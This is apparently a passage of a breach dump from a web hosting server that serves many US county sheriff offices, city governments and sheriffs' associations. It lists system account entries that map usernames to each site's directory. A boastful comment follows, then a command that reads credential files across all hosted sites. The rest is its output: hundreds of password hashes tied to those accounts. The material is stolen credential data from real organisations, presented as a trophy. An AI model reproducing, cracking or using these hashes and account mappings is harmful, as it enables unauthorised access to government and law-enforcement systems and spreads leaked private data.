  568. drweb:x:101:2523:DrWeb system account:/var/drweb:/bin/false
  569. jdpa:x:10001:2522::/var/www/vhosts/20jdpa.com:/bin/false
  570. barms:x:10002:2522::/var/www/vhosts/barrycountysheriff.com:/bin/false
  571. bcsd:x:10003:2522::/var/www/vhosts/baxtercountysheriff.com:/bin/bash
  572. bjm:x:10004:2522::/var/www/vhosts/mostwantedwebsites.net:/bin/false
  573. demo:x:10005:2522::/var/www/vhosts/mostwantedwebsites.net/subdomains/demo:/bin/
  574. false
  575. dymin:x:10006:2522::/var/www/vhosts/mostwantedwebsites.net/subdomains/dymin:/bin
  576. /false
  577. dcsd:x:10007:2522::/var/www/vhosts/drewcountysheriff.com:/bin/false
  578. bocg:x:10008:2522::/var/www/vhosts/boonecountyar.com:/bin/false
  579. crcsd:x:10009:2522::/var/www/vhosts/crosscountysheriff.org:/bin/false
  580. bocs:x:10010:2522::/var/www/vhosts/boonesheriff.com:/bin/false
  581. izhth:x:10011:2522::/var/www/vhosts/izardhometownhealth.com:/bin/false
  582. mcmtn:x:10012:2522::/var/www/vhosts/mcminncountysheriff.com:/bin/false
  583. ccsal:x:10013:2522::/var/www/vhosts/cherokeecountyalsheriff.com:/bin/false
  584. tunms:x:10014:2522::/var/www/vhosts/tunicamssheriff.com:/bin/false
  585. ccsd:x:10015:2522::/var/www/vhosts/cleburnecountysheriff.com:/bin/false
  586. ciwy:x:10016:2522::/var/www/vhosts/cityofwynne.com:/bin/false
  587. ncsd:x:10017:2522::/var/www/vhosts/newtoncountysheriff.org:/bin/false
  588. icsd:x:10019:2522::/var/www/vhosts/izardcountysheriff.org:/bin/false
  589. shsd:x:10020:2522::/var/www/vhosts/sharpcountysheriff.com:/bin/false
  590. polms:x:10021:2522::/var/www/vhosts/polkcountymosheriff.org:/bin/false
  591. grcg:x:10023:2522::/var/www/vhosts/grantcountyar.com:/bin/false
  592. lawmo:x:10024:2522::/var/www/vhosts/lawrencecosheriff.com:/bin/false
  593. johms:x:10025:2522::/var/www/vhosts/jocomosheriff.org:/bin/false
  594. sacsd:x:10026:2522::/var/www/vhosts/scsosheriff.org:/bin/false
  595. jcsd:x:10027:2522::/var/www/vhosts/jacksonsheriff.org:/bin/false
  596. gcsd:x:10028:2522::/var/www/vhosts/grantcountysheriff-collector.com:/bin/false
  597. izcg:x:10029:2522::/var/www/vhosts/izardcountyar.org:/bin/false
  598. jocsd:x:10030:2522::/var/www/vhosts/johnsoncosheriff.com:/bin/false
  599. scsd:x:10031:2522::/var/www/vhosts/sebastiancountysheriff.com:/bin/false
  600. bjm2:x:10032:2522::/var/www/vhosts/mostwantedgovernmentwebsites.com:/bin/false
  601. test:x:10033:10033::/home/test:/bin/bash
  602. bcsd_sync:x:10034:10034::/var/www/vhosts/baxtercountysheriff.com/home:/bin/bash
  603. ccsal_synce:x:10035:10035::/home/ccsal_synce:/bin/bash
  604. ccsal_sync:x:10036:10036::/var/www/vhosts/cherokeecountyalsheriff.com/home:/bin/
  605. bash
  606. kluser:x:10037:10037:Kaspersky AntiVirus scanner user:/var/db/kav:/sbin/nologin
  607. tigeraccessftp:x:10038:10038::/var/www/vhosts/crosscountysheriff.org/home:/bin/
  608. bash
  609. vbcsd:x:10039:2522::/var/www/vhosts/vbcso.com:/bin/false
  610. jonms2:x:10040:2522::/var/www/vhosts/jonesso.com:/bin/false
  611. ccsoks:x:10041:2522::/var/www/vhosts/cherokeecountykssheriff.com:/bin/false
  612. crcg:x:10042:2522::/var/www/vhosts/crosscountyar.org:/bin/false
  613. tcsoms:x:10043:2522::/var/www/vhosts/tatecountysheriff.com:/bin/false
  614. hcsoks:x:10018:2522::/var/www/vhosts/hodgemansheriff.us:/bin/false
  615. jcsoks:x:10044:2522::/var/www/vhosts/jeffersoncountykssheriff.com:/bin/false
  616. mosa:x:10045:2522::/var/www/vhosts/mosheriffs.com:/bin/false
  617. pcsoks:x:10046:2522::/var/www/vhosts/prattcountysheriff.com:/bin/false
  618. johms_sync:x:10047:10047::/var/www/vhosts/jocomosheriff.org/home:/bin/bash
  619. hcsar:x:10022:2522::/var/www/vhosts/howardcountysheriffar.com:/bin/false
  620. hscar:x:10048:2522::/var/www/vhosts/hotspringcountysheriff.com:/bin/false
  621. pcsoia:x:10049:2522::/var/www/vhosts/plymouthcountysheriff.com:/bin/false
  622. mcsd:x:10050:2522::/var/www/vhosts/marioncountysheriffar.com:/bin/false
  623. wsoks:x:10051:2522::/var/www/vhosts/woodsonsheriff.com:/bin/false
  624. mosa2010:x:10052:10052::/var/www/vhosts/mosheriffs.com/httpdocs/academy/
  625. file_manager:/bin/bash
  626. faoret:x:10053:2522::/var/www/vhosts/faoret.com:/bin/false
  627. bcso_tiger:x:10054:2522::/var/www/vhosts/boonesheriff.com/home:/bin/false
  628. stcsd:x:10055:2522::/var/www/vhosts/stonecountysheriff.com:/bin/false
  629. ccsoms:x:10056:2522::/var/www/vhosts/coahomacountysheriff.com:/bin/false
  630. kcsoms:x:10057:2522::/var/www/vhosts/kempercountysheriff.com:/bin/false
  631. pcsoks_sync:x:10058:10058::/var/www/vhosts/prattcountysheriff.com/home:/bin/
  632. false
  633. mocsd:x:10059:2522::/var/www/vhosts/monroecountysheriffar.com:/bin/false
  634. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  635. bcsoga:x:10060:2522::/var/www/vhosts/bakercountysheriffoffice.org:/bin/false
  636. jonms_sync:x:10061:10061::/var/www/vhosts/jonesso.com/home:/bin/bash
  637. jcsoks_sync:x:10062:10062::/var/www/vhosts/jeffersoncountykssheriff.com/home:/
  638. bin/bash
  639. cpsola:x:10063:2522::/var/www/vhosts/cameronso.org:/bin/false
  640. cgsomo:x:10064:2522::/var/www/vhosts/capecountysheriff.org:/bin/false
  641. sfsoar:x:10065:2522::/var/www/vhosts/stfranciscountysheriff.org:/bin/false
  642. sfsoar_sync:x:10066:10066::/var/www/vhosts/stfranciscountysheriff.org/home:/bin/
  643. bash
  644. code:x:10067:2522::/var/www/vhosts/mostwantedwebsites.net/subdomains/code:/bin/
  645. false
  646. fcsoga:x:10068:2522::/var/www/vhosts/floydcountysheriff.org:/bin/false
  647. mcsoga:x:10069:2522::/var/www/vhosts/meriwethercountysheriff.org:/bin/false
  648. code2:x:10070:2522::/var/www/vhosts/admin.mostwantedwebsites.net:/bin/false
  649. kcsoil:x:10071:2522::/var/www/vhosts/knoxcountysheriffil.com:/bin/false
  650. mcsoal:x:10072:2522::/var/www/vhosts/marionsoal.com:/bin/false
  651. sgsomo:x:10073:2522::/var/www/vhosts/sgcso.com:/bin/false
  652. gcsoms:x:10074:2522::/var/www/vhosts/georgecountymssheriff.com:/bin/false
  653. stoms:x:10075:2522::/var/www/vhosts/stonecountymosheriff.com:/bin/false
  654. hcsar_sync:x:10076:10076::/var/www/vhosts/howardcountysheriffar.com/home/:/bin/
  655. bash
  656. alsa:x:10077:2522::/var/www/vhosts/alabamasheriffs.com:/bin/false
  657. pcsoar:x:10078:2522::/var/www/vhosts/perrycountysheriffar.org:/bin/false
  658. rcsd:x:10079:2522::/var/www/vhosts/randolphcountysheriff.org:/bin/false
  659. tisoms:x:10081:2522::/var/www/vhosts/tishomingocountysheriff.com:/bin/false
  660. stoms_sync:x:10082:10082::/var/www/vhosts/stonecountymosheriff.com/home:/usr/
  661. libexec/openssh/sftp-server
  662. prsoar:x:10083:2522::/var/www/vhosts/prairiecountysheriff.org:/bin/false
  663. mcsd_sync:x:10084:10084::/var/www/vhosts/marioncountysheriffar.com/home/xmlapp:/
  664. bin/bash
  665. jccgms:x:10086:2522::/var/www/vhosts/jeffersoncountyms.gov:/bin/false
  666. ccsook:x:10087:2522::/var/www/vhosts/sheriffcomanche.com:/bin/false
  667. fcsoar:x:10088:2522::/var/www/vhosts/fultoncountyso.org:/bin/false
  668. poalac:x:10085:2522::/var/www/vhosts/poalac.org:/bin/false
  669. arsa:x:10091:2522::/var/www/vhosts/arkansassheriffsassociation.com:/bin/false
  670. rcpica:x:10080:2522::/var/www/vhosts/rcpi-ca.org:/bin/false
  671. ciga:x:10092:2522::/var/www/vhosts/cityofgassville.org:/bin/false
  672. sfcgar:x:10093:2522::/var/www/vhosts/stfranciscountyar.org:/bin/false
  673. lcsomo:x:10094:2522::/var/www/vhosts/lcsdmo.com:/bin/false
  674. tcsoal:x:10095:2522::/var/www/vhosts/talladegasheriff.org:/bin/false
  675. jwiegand:x:10096:10096::/home/jwiegand:/bin/bash
  676. bcsf:x:10097:2522::/var/www/vhosts/baxtercountysherifffoundation.org:/bin/false
  677. prsoms:x:10089:2522::/var/www/vhosts/prentisscountymssheriff.com:/bin/false
  678. acsoms:x:10098:2522::/var/www/vhosts/adamscosheriff.org:/bin/false
  679. kssa:x:10099:2522::/var/www/vhosts/kansassheriffs.org:/bin/false
  680.  
  681. // CAT'N HUNDREDS OF .HTPASSWD FILES IN ONE COMMAND LIKE A BOSS
  682.  
  683. $ cat /var/www/vhosts/*/pd/*
  684. 2010user:$1$YfJPNAST$w9rRAaYhAMjpkw.GRLUD90
  685. jdpa:$1$e1JbcQkZ$sR59gW8uPd/6Dyae9xneL0
  686. jdpa:$1$uBEldfcW$mzSY61wj97PN41JWNPcA9/
  687. jdpa:$1$e1JbcQkZ$sR59gW8uPd/6Dyae9xneL0
  688. acsoms:$1$/OuADgxB$l7pPU2kXeKlw7Iz9NLGID.
  689. acsoms:$1$uDsXPWpq$mhRoR3B3JicVBpuHWxYue1
  690. acsoms:$1$uDsXPWpq$mhRoR3B3JicVBpuHWxYue1
  691. code:$1$7.KAx/YD$J7SuxsDsBOij.qgPD3GJ60
  692. code:$1$7.KAx/YD$J7SuxsDsBOij.qgPD3GJ60
  693. alsa:$1$gg9rFhvF$S41htlhsl3AJYZu4dKWR50
  694. alsa:$1$RnNxf5wV$NMmcQvODrjBzyi0RI1MqO.
  695. alsa:$1$RnNxf5wV$NMmcQvODrjBzyi0RI1MqO.
  696. arsa:$1$uKT57hqw$3KrrKngKKD.J8nFMYq0nf/
  697. arsa2:$1$T5fkiwpg$e/uoUu17TnKUZU2pcgZhw1
  698. arsa:$1$3GhQNCaB$27W57EtzM3cih1f3mq3PJ.
  699. arsa2:$1$T5fkiwpg$e/uoUu17TnKUZU2pcgZhw1
  700. arsa:$1$3GhQNCaB$27W57EtzM3cih1f3mq3PJ.
  701. bcsoga:$1$wD0B3RJw$F/kRNzUrqyAsXGEZUUt7t.
  702. bcsoga:$1$WYfgp0d5$yGsh3sHH74GpPqmsI./K..
  703. bcsoga:$1$WYfgp0d5$yGsh3sHH74GpPqmsI./K..
  704. barms:$1$SUoLPR6X$xTEXrkDGFZax3XGxa0RIv.
  705. barms:$1$n5/TqDsD$Je.PVoLmE.WjgYgnPOOZ91
  706. barms:$1$2bdOu.yt$HfX7Ziq4mwgqQxFCBlnNq0
  707. barms:$1$SUoLPR6X$xTEXrkDGFZax3XGxa0RIv.
  708. barms:$1$n5/TqDsD$Je.PVoLmE.WjgYgnPOOZ91
  709. bcsd:$1$.wyutJHS$fI7mFoV8F0txtXS3yCYxr.
  710. bcsd:$1$8HNY0AzH$FLIStjcXdzSLFnVcWOs7/1
  711. bcsf:$1$/xEB/mNM$5JyBevwhGqzByNokDINVe/
  712. bcsf:$1$hRqF1Z2z$/FHJTOkZj0hUgiPlQ0vfc/
  713. bcsf:$1$hRqF1Z2z$/FHJTOkZj0hUgiPlQ0vfc/
  714. bocg:$1$d04I8Pzb$W0qBTons8Dmm2Jw9We3xB/
  715. bocg:$1$02/JMqdi$AlaU02rOAV3KvEnUNNL8D0
  716. bocg:$1$GvD5EuF.$RZ/I71SmN2YCppnS3KtbT0
  717. bocg:$1$02/JMqdi$AlaU02rOAV3KvEnUNNL8D0
  718. bocs:$1$oZB0olYk$/qQ.rLe8/yBnA5lT4HDga1
  719. bocs:$1$VKqRM2ax$zoW/qKKWb8gOJtgV0fq4l0
  720. bocs:$1$qsQEjN0k$8UNgs23OwLrA73XUXxSCa.
  721. bocs:$1$VKqRM2ax$zoW/qKKWb8gOJtgV0fq4l0
  722. cpsola:$1$A0/je.pN$ZGoDb3fmCJdQ1qUB6aRhk1
  723. cpsola:$1$xW03epN7$kzwfnnjUKA9gDDkKY8wW90
  724. cpsola:$1$xW03epN7$kzwfnnjUKA9gDDkKY8wW90
  725. cgsomo:$1$VEkM1y42$PkxqdiFVBiJ6pt/lbKd1M1
  726. cgsomo:$1$pxHLS2OD$o2/3rANs15wVSytWjf2dW.
  727. cgsomo:$1$VEkM1y42$PkxqdiFVBiJ6pt/lbKd1M1
  728. cgsomo:$1$pxHLS2OD$o2/3rANs15wVSytWjf2dW.
  729. ccsal:$1$nqrzKwH1$1SUCJG3Ge1jLbd6a4pd.61
  730. ccsal:$1$P2GM8ay4$CT6rlv6.Pa.gnGvdH/jGd0
  731. ccsal:$1$IexvBxv4$d.exkq9idTn05wW6smXSF1
  732. ccsal:$1$P2GM8ay4$CT6rlv6.Pa.gnGvdH/jGd0
  733. ccsoks:$1$KKczisBp$d1rBOCK8iRkjmBZhv.YXp.
  734. ccsoks:$1$BbttpHqg$TzMxb1f40QefP8kSIEpJn/
  735. ciga:$1$Rv6VwWuC$vB55fX6KtgnttO7Bwjni71
  736. ciga:$1$TmVOejq7$6l3ck2oHWua3./QacXOOY0
  737. ciga:$1$Rv6VwWuC$vB55fX6KtgnttO7Bwjni71
  738. ciga:$1$TmVOejq7$6l3ck2oHWua3./QacXOOY0
  739. ciwy:$1$/DFbGKuZ$NNH1VE8TXfaBhuJHDca2x1
  740. ciwy:$1$Hj5GiFRd$67iKTvcJ/vIn5QhHz0GSi.
  741. ciwy:$1$9olIl6Nc$ycMPhxfVWGJ5Ka5ZLlEtK0
  742. ciwy:$1$Hj5GiFRd$67iKTvcJ/vIn5QhHz0GSi.
  743. ccsd:$1$IT4RKfjK$um0Ty6wMJ8O7kIIbIJqRD1
  744. ccsd:$1$MtoFD9pW$WwKV7ocH2WZ4XeQIUji2t.
  745. ccsd:$1$SORBbPS1$MPxim.kDNpNeuwwAE2Ugb0
  746. ccsd:$1$MtoFD9pW$WwKV7ocH2WZ4XeQIUji2t.
  747. ccsoms:$1$PGQZTZay$8g.aw5516ifzB9pfGUdZX.
  748. ccsoms:$1$1jGRZXFI$M.ZHK0GCyYN9fDSzvXJqj1
  749. ccsoms:$1$1jGRZXFI$M.ZHK0GCyYN9fDSzvXJqj1
  750. crcg:$1$ygtelVAp$E9V85e3doWLLyyCMCv2KB1
  751. crcg:$1$5su/.Qwz$X2HHctVlA6/HYhpzsR0c4.
  752. crcg:$1$5su/.Qwz$X2HHctVlA6/HYhpzsR0c4.
  753. crcsd:$1$r7WoQcbv$fR4knFo1YqBYUb91ES7/K.
  754. crcsd:$1$cEVq9UZj$6hN2GCkyMdjGihvuErMm5.
  755. crcsd:$1$cEVq9UZj$6hN2GCkyMdjGihvuErMm5.
  756. dcsd:$1$/3GteTce$sYf4e6A7O0ais2J1EyTMz.
  757. dcsd:$1$3uDJVnXz$ACH.YfW7RD6IkUmBJw.Qf1
  758. dcsd:$1$BBBW.zd2$G4ZJegTfHreCJXwojwA8P0
  759. dcsd:$1$3uDJVnXz$ACH.YfW7RD6IkUmBJw.Qf1
  760. fcsoga:$1$oC0dNlM6$GfFCuZ2N2UnKMI9MZWbwb1
  761. fcsoga:$1$OFx4pJAP$rtexMxn/zMfeVJ5X0b8Ht0
  762. fcsoga:$1$OFx4pJAP$rtexMxn/zMfeVJ5X0b8Ht0
  763. fcsoar:$1$NV21fnUn$TKRx2pGwv65iFBNS14mTF0
  764. fcsoar:$1$NV21fnUn$TKRx2pGwv65iFBNS14mTF0
  765. gcsoms:$1$Cp0Vf.Mu$9eMW4Joy12hktH7WGrBgE/
  766. gcsoms:$1$ZJfK81Ef$mxUuwQyIxgR9Tcry9GaPJ0
  767. gcsoms:$1$Cp0Vf.Mu$9eMW4Joy12hktH7WGrBgE/
  768. gcsoms:$1$ZJfK81Ef$mxUuwQyIxgR9Tcry9GaPJ0
  769. grcg:$1$Ivu4aPQu$weOoXmrm8jtNOUrFTS3vf.
  770. grcg:$1$BtNB1Qvt$MECZW/z2scG0.YmU0275P1
  771. grcg:$1$HPX7vhZO$LWzATw3fluPOYFYnDd3I61
  772. grcg:$1$BtNB1Qvt$MECZW/z2scG0.YmU0275P1
  773. gcsd:$1$T7O8tM.l$AUYTc4uhY7aYuhVfHNW/9/
  774. gcsd:$1$.Kid76wv$TXtyOAf2OBlWRYpLETtmI/
  775. gcsd:$1$07x6ii.Y$K33yOQCuMu9juWBU0.tw31
  776. gcsd:$1$.Kid76wv$TXtyOAf2OBlWRYpLETtmI/
  777. hcsoks:$1$3qklJZQ5$ERPeSxH1DtuX2pis0ah0q0
  778. hcsoks:$1$AuLMRUku$8SKs01E6RyoJdROiAYDyc1
  779. hcsoks:$1$AuLMRUku$8SKs01E6RyoJdROiAYDyc1
  780. hscar:$1$gJJLpsPa$lQkGfO6sT0TM/p/ACmieM0
  781. hscar:$1$7a5hW/P0$MQLz4hMPtybIEnXacaxkB/
  782. hscar:$1$7a5hW/P0$MQLz4hMPtybIEnXacaxkB/
  783. hcsar:$1$Jy4Wo5AA$dgDDznszPUBYPmuM7eBj9.
  784. hscar:$1$563phfjq$fJXMTTDBQFGqbC41mVBCc1
  785. hcsar:$1$mwnHyqQU$tLX26Szlbqp7IXYIp5Djt0
  786. hscar:$1$563phfjq$fJXMTTDBQFGqbC41mVBCc1
  787. hcsar:$1$mwnHyqQU$tLX26Szlbqp7IXYIp5Djt0
  788. izcg:$1$SzRnGt.T$085pTzlcqWgJv7DguG6dv1
  789. izcg:$1$rxszlSxW$JxnDEaPC8rll/JZuNY8sI/
  790. izcg:$1$rxszlSxW$JxnDEaPC8rll/JZuNY8sI/
  791. icsd:$1$XwGJZ7Ia$sj99HKjkzILx6qGDiWmHy.
  792. icsd:$1$VHblzCiz$PK3BhSLA03R2DgweLIhb.0
  793. icsd:$1$vo3ZSlXF$DTLKCc/7z6IFgvbFtvCAT1
  794. icsd:$1$VHblzCiz$PK3BhSLA03R2DgweLIhb.0
  795. izhth:$1$mrQmTDHz$Nr02zDwC5m7NxplWZWW0O/
  796. izhth:$1$kW3h3D6.$ti22h0sbYTzw/Ofgjk8Rm1
  797. izhth:$1$IbDSXX4O$sFVTpg5ts1EagLkzoNZQ30
  798. izhth:$1$kW3h3D6.$ti22h0sbYTzw/Ofgjk8Rm1
  799. jcsd:$1$ZkEh5MIb$v3l1z3PQZ5yyG5ABzWef2/
  800. jcsd:$1$A87LOoWD$u80mHmVF294QXfQ7dVjb.0
  801. jcsd:$1$HgNpXLdQ$KPP62pOHPjl7XslEBTqGH/
  802. jcsd:$1$A87LOoWD$u80mHmVF294QXfQ7dVjb.0
  803. jcsoks:$1$Z/D6TvAM$JGvIns6wx.RCPwv0C51TJ/
  804. jcsoks:$1$OHfiOqfm$8tGCZ2uTAHXRBRNyJqazZ.
  805. jcsoks:$1$OHfiOqfm$8tGCZ2uTAHXRBRNyJqazZ.
  806. jccgms:$1$aHstkoLz$tOpRH9HwTGLjSF7YZRiuo.
  807. jccgms:$1$cPnrWOYL$jpmVU3beLfxNR.98st9wR.
  808. jccgms:$1$xi9Cf0im$4vC24C1vlcoteo1aDEFJW.
  809. jccgms:$1$cPnrWOYL$jpmVU3beLfxNR.98st9wR.
  810. johms:$1$fmryjChe$CwJyPptiu0Iwcai2LUTPu0
  811. johms:$1$EGoRh47t$VeQc8nUMJpn0S0fPyvp0i1
  812. johms:$1$nykSrZ50$0yH62S8FZq3NOczux2cjC/
  813. johms:$1$EGoRh47t$VeQc8nUMJpn0S0fPyvp0i1
  814. jocsd:$1$s63jViKP$gaT9byX/ySNJDMkA5.PCd.
  815. jocsd:$1$9Zmq1s1M$/xBn12NyVfewPRMH0J73M1
  816. jocsd:$1$u.mk/ipa$.WSRBIK6MvsWHcfTMt//I/
  817. jocsd:$1$9Zmq1s1M$/xBn12NyVfewPRMH0J73M1
  818. jonms:$1$fLjLWKCb$UDgyy9UzkwyiJC7AWtD40/
  819. jonms:$1$GAvUpe2m$GBlG9CkDHQT7/w5eTW/Zt0
  820. jonms2:$1$vyR1pe5I$ID4xTk5I3FHrrZ3BhYvgS.
  821. jonms:$1$GAvUpe2m$GBlG9CkDHQT7/w5eTW/Zt0
  822. jonms2:$1$vyR1pe5I$ID4xTk5I3FHrrZ3BhYvgS.
  823. kssa:$1$YlbQvrcd$ruaMsfYDwhVlH1k/LGlIJ.
  824. kssa:$1$nhxP66t9$GECAPnEVRDk9YnmSpzBzw/
  825. kssa:$1$nhxP66t9$GECAPnEVRDk9YnmSpzBzw/
  826. kcsoms:$1$goZMALd1$JnxVQ9J603tEsthqkadvE.
  827. kcsoms:$1$Aku.pAac$sQku4Yf6IslqTJkGHyAYS1
  828. kcsoms:$1$Aku.pAac$sQku4Yf6IslqTJkGHyAYS1
  829. kcsoil:$1$4XOK98tG$kjOUaIN3ZNZepl3aCHijc.
  830. kcsoil:$1$mnLz6xRu$uymq2TMKdpBwAmMiLszwK0
  831. kcsoil:$1$mnLz6xRu$uymq2TMKdpBwAmMiLszwK0
  832. lawmo:$1$MezHiiqn$OoLtNNLAm20gBBvW0BtOB0
  833. lawmo:$1$h11BRv3g$wA.ITq8U0Cq4N4ZHoDVmC0
  834. lawmo:$1$5jjY0Omy$eWZkfvCtF0tLdyDv9fmnC0
  835. lcsomo:$1$I/cdxg/g$Pn2tTJK776Si9phzUfNzT1
  836. lcsomo:$1$MkJfhMLZ$rAq1JH9h2GUCMAt2ee2Pe.
  837. lcsomo:$1$MkJfhMLZ$rAq1JH9h2GUCMAt2ee2Pe.
  838. mcsd:$1$NZpwhOoE$4zeC8H.PhoyVjsBhB4VFb1
  839. mcsd:$1$7WN0tH.P$dF0W1vtyA905OcSktC2TG0
  840. mcsd:$1$7WN0tH.P$dF0W1vtyA905OcSktC2TG0
  841. mcsoal:$1$pXqWNJx3$1brOy.05LrQ82qohEMM5k0
  842. mcsoal:$1$1/1E1eTW$epzJFtOGo/Me/eeo.6Dg//
  843. mcsoal:$1$pXqWNJx3$1brOy.05LrQ82qohEMM5k0
  844. mcsoal:$1$OPKYzsqo$WmTHzrV/WlbZPH4JWKQ41.
  845. mcmtn:$1$dJKz4stC$wxWzTBkC76Mox8yv5i8z9/
  846. mcmtn:$1$eiPrIslY$DwuwtcCE/lZGRRERwQzLj.
  847. mcmtn:$1$AGtoxXro$zlQV8/C674RTOhMwp9Pqf1
  848. mcmtn:$1$eiPrIslY$DwuwtcCE/lZGRRERwQzLj.
  849. mcsoga:$1$p2oL7Pi5$LusOSWnvUHofJ0iAvhvEr0
  850. mcsoga:$1$JBIgDN3w$NaxB7Cv29dmMlHu7SeULe0
  851. mcsoga:$1$JBIgDN3w$NaxB7Cv29dmMlHu7SeULe0
  852. mocsd:$1$1bJZUS9v$9cPKxA8hiX1bKbCz6Js1i1
  853. mocsd:$1$SsZ3rxzM$knv3hb7EWCbl8PV5HKL7H/
  854. mocsd:$1$SsZ3rxzM$knv3hb7EWCbl8PV5HKL7H/
  855. mosa:$1$KHDMeYMH$n2TpSddsFNMedje0Wae1n0
  856. mosa:$1$q4tmIHbo$ntiw9G1B1q.WciNBRMivy.
  857. mosa:$1$KHDMeYMH$n2TpSddsFNMedje0Wae1n0
  858. mosa:$1$q4tmIHbo$ntiw9G1B1q.WciNBRMivy.
  859. CityPass:$1$pJ75xXss$N1LTh9EwM.aKAeZBjdp7N/
  860. PerryCounty:$1$T6K61l6D$05/rRhPd6fDPqVuJUQKfF/
  861. bjm2:$1$siaaoUej$HKLUXyUyF1MDSxZxZwuA60
  862. bjm:$1$bXLmD2bt$4Rk5jfA2x8UcJ7W4Tw35s0
  863. bjm2:$1$siaaoUej$HKLUXyUyF1MDSxZxZwuA60
  864. bjm:$1$Sx95fGzg$6ASZ4J6kjziYIDH6xQcki1
  865. 2010user:$1$vFJrv2A6$K82FAw89ZvDc1pvHdLhA21
  866. bjm:$1$Ok6D4NjH$EwV/0tzoir0Jg7tMNdaCi0
  867. bjm:$1$Ds5nOfeW$snloc4PMymDdgG5ld6wjw/
  868. bjm:$1$Ok6D4NjH$EwV/0tzoir0Jg7tMNdaCi0
  869. ncsd:$1$3Ocas0HS$Wg2AZygMmPne.rCxh4n9Y0
  870. ncsd:$1$oG2ozgkS$rWU7H1tSjruBwWTcgp7/Q1
  871. ncsd:$1$bSp.iYg8$cr1ZzEYuBTVU.vCPhC6sw/
  872. ncsd:$1$oG2ozgkS$rWU7H1tSjruBwWTcgp7/Q1
  873. pcsoar:$1$K6/0rhqT$wRDJbN4R.bqsfghHNriYL0
  874. pcsoar:$1$UccqZPzO$B340qL0btZjpC4B5sXjRA0
  875. pcsoar:$1$K6/0rhqT$wRDJbN4R.bqsfghHNriYL0
  876. pcsoar:$1$UccqZPzO$B340qL0btZjpC4B5sXjRA0
  877. pcsoia:$1$e3ASKnqy$ps9LSniLjC3kOkGaGn5YM0
  878. pcsoia:$1$yQNrFpc4$RHckr28Py0PEuaud1iwo50
  879. pcsoia:$1$yQNrFpc4$RHckr28Py0PEuaud1iwo50
  880. poalac:$1$wHCRN78K$bCGrbmh1nNblDl7T/qzaj.
  881. poalac:$1$JsmvqHiU$o/tq6grKR/zCLOY2Uz9gS1
  882. poalac:$1$wHCRN78K$bCGrbmh1nNblDl7T/qzaj.
  883. poalac:$1$JsmvqHiU$o/tq6grKR/zCLOY2Uz9gS1
  884. polms:$1$0WmykzWZ$TliFQQUb.tPhPMpuuaotW0
  885. polms:$1$AWXV65hR$v1sMwFsSjZNrkfrNqgHmy.
  886. polms:$1$0WmykzWZ$TliFQQUb.tPhPMpuuaotW0
  887. polms:$1$AWXV65hR$v1sMwFsSjZNrkfrNqgHmy.
  888. prsoar:$1$2jmIGv7j$0zSfngOL9UeBLq/zsuFGg1
  889. prsoar:$1$EU8wJZpQ$J8f.N8UKLOOfAJEfbUTAw0
  890. prsoar:$1$EU8wJZpQ$J8f.N8UKLOOfAJEfbUTAw0
  891. pcsoks:$1$84DZ5jUv$22478RXYSJ83Yon/VbXoq0
  892. pcsoks:$1$dWgONAoy$XDqV96Eij0BF.jLjwW7qr.
  893. pcsoks:$1$dWgONAoy$XDqV96Eij0BF.jLjwW7qr.
  894. prsoms:$1$Nfacesfq$cwqZNxlFjJo8N/RrOodIY1
  895. prsoms:$1$iuK4mNPP$4MRRvrhMfc.sniKZxGwFS.
  896. prsoms:$1$iuK4mNPP$4MRRvrhMfc.sniKZxGwFS.
  897. rcsd:$1$aM0/EhqP$HPTN/wX2L0ErPIsaYADow1
  898. rcsd:$1$bJTnrSZb$irgq.KT3PHaIXcb7fD9/11
  899. rcsd:$1$bJTnrSZb$irgq.KT3PHaIXcb7fD9/11
  900. rcpica:$1$6FIHrPeK$mspB9nNY4YNy/.9brKRlP.
  901. rcpica:$1$SlOVAGuO$CrMYHXoe5EsoBX5C3HN1R1
  902. rcpica:$1$SlOVAGuO$CrMYHXoe5EsoBX5C3HN1R1
  903. sacsd:$1$ZLGR289Y$KevSJOo0PezTAqatJUouK.
  904. sacsd:$1$L6oPyMeK$WJlfrokd6bZl8XzNAuwRx1
  905. sacsd:$1$dIxeOzw5$SdsN7F6iYxyryZLodaDHC0
  906. sacsd:$1$L6oPyMeK$WJlfrokd6bZl8XzNAuwRx1
  907. scsd:$1$aRIkZHPq$dYZwP7SrhhumFy6QVTNr1/
  908. scsd:$1$oJwcYy6M$/CY4yYYTWLsgIPvuGA6qZ0
  909. scsd:$1$L05Gndoq$V8OevuZqUMK//gsBOPmxq1
  910. scsd:$1$oJwcYy6M$/CY4yYYTWLsgIPvuGA6qZ0
  911. sgsomo:$1$kFw.79HG$KMcvV/zhzzB2PUzy0860N.
  912. sgsomo:$1$gG5yK4xU$ONDYP.tlcg6YTaB9NSAyJ0
  913. sgsomo:$1$gG5yK4xU$ONDYP.tlcg6YTaB9NSAyJ0
  914. shsd:$1$2Qzvqur1$erX5RIvC9bt48DoK9UXgn1
  915. shsd:$1$KkowHXJI$0OENU1ePlaa16r6/R66RM.
  916. shsd:$1$dWHRMEmO$r0SD3BNmRZFNgcJjd2zJh.
  917. shsd:$1$KkowHXJI$0OENU1ePlaa16r6/R66RM.
  918. ccsook:$1$vI8JJAm1$XXWEHCO6htvjMb56c/HE9/
  919. ccsook:$1$jcQ9B6fS$h6xEznJEHVN2AJCwSIarf1
  920. ccsook:$1$jcQ9B6fS$h6xEznJEHVN2AJCwSIarf1
  921. sfcgar:$1$EqTn7VjG$LWSf095sVWtuTPWQioUVt/
  922. sfcgar:$1$MUBD7oyy$.sTGmbMwRsdBYrfQXfbh6/
  923. sfcgar:$1$MUBD7oyy$.sTGmbMwRsdBYrfQXfbh6/
  924. sfsoar:$1$dvPtn2zd$GlH7j4etEjFOySAHu4oZV0
  925. sfsoar:$1$pZBZJ3Bf$rQlq6FDy7VPjhPYFZ1P64.
  926. sfsoar:$1$pZBZJ3Bf$rQlq6FDy7VPjhPYFZ1P64.
  927. stoms:$1$2VDTPaiT$o6kUTW6UXLdy6zeqLL2q00
  928. stoms:$1$WyeLFT5e$6KzSbxJ9MuqkYgAaonFqh.
  929. stoms:$1$WyeLFT5e$6KzSbxJ9MuqkYgAaonFqh.
  930. stcsd:$1$36mnxETG$J0BtoGvBQUIlajywJ65EU.
  931. stcsd:$1$TRu9HU67$tsjdX..cGgp4/HOA5IRBk1
  932. stcsd:$1$TRu9HU67$tsjdX..cGgp4/HOA5IRBk1
  933. tcsoal:$1$8IvtSsof$Js4ss4101mHXRhS1UgW.z/
  934. tcsoal:$1$Yf8T/mm8$xbXyku1q9H0g30wAxwler/
